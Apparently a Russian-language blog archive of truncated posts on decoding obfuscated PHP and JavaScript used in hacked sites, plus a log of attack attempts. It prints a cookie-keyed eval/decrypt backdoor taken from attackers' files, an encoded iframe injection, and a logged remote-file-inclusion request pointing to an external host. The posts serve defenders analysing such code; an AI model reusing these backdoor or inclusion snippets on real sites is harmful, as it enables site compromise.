Архив метки: скрипты

Скрытие кода, метод 3

Не совсем PHP, но тоже может быть интересно. Для вставки в страницы вредительского кода, в частности блоков iframe, используют javascript и данные, закодированные в unicode: <script type="text/javascript">document.write(‘\u003c\u0069\u0066\u0072\u0061\u006d\u0065’)</script> Раскодировать можно с помощью PHP: $str = "\u003c\u0069\u0066\u0072\u0061\u006d\u0065"; $str = preg_replace( "/\\\\u([0-9a-f]{3,4})/i", "&#x\\1;", $str ); $str = html_entity_decode( $str, null, ‘UTF-8’ ); echo $str . "\n"; Чтобы посмотреть,… Читать далее »

Скрытие кода, метод 2

Следующий код был выдран из файла хакеров (или взломщиков или скрипткидсов), в закодированной строке был URL на внешний сайт, с которого подтягивался еще один кусок кода. @eval(decrypt("CODECODE==",$_COOKIE[‘HASH’])); exit; function decrypt($txt,$key){ $txt=base64_decode($txt); $res=""; for($i=0; $i<strlen($txt); $i++){ $c=substr($txt,$i,1); $kc=substr($key,($i%strlen($key))-1,1); $c=chr(ord($c)-ord($kc)); $res.=$c; } return $res; Раскодировывается просто, хотя на вскидку сложнее сказать/увидеть, что за манипуляции производятся со строкой:… Читать далее »

Скрытие кода, метод 1

Один из самых популярных способов скрыть код, часто встречается в темах WordPress и других движков и иногда в самих движках. Код выглядит следующим образом: eval(base64_decode("CODECODECODE==")); eval(gzinflate(base64_decode("CODECODECODE=="))); Первый вариант ломается легко, стоит только раскодировать строку из base64, второй – сложнее, нужно запихнуть все в переменную и сохранить в файл: $text = gzinflate(base64_decode("CODECODECODE==")); $fp = fopen(‘decoded.txt’, ‘w’);… Читать далее »

Конкурс c призами

Конкурс на самый самый самый круто закодированный PHP-файл. 1 место – 500 грн 2 место – 100 грн работы 🙂 присылайте на hahack /собака/ netspider.kiev.ua условия: — код может быть как вашим, так и позаимствованным из откуда угодно; интересные кодировки бывают во всяких вирусах или платных скриптах. — файл должен быть автономным и работоспособным, т.е.… Читать далее »

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP. /var/log/messages: Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’) Пример запроса (из лога апача): 211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt???… Читать далее »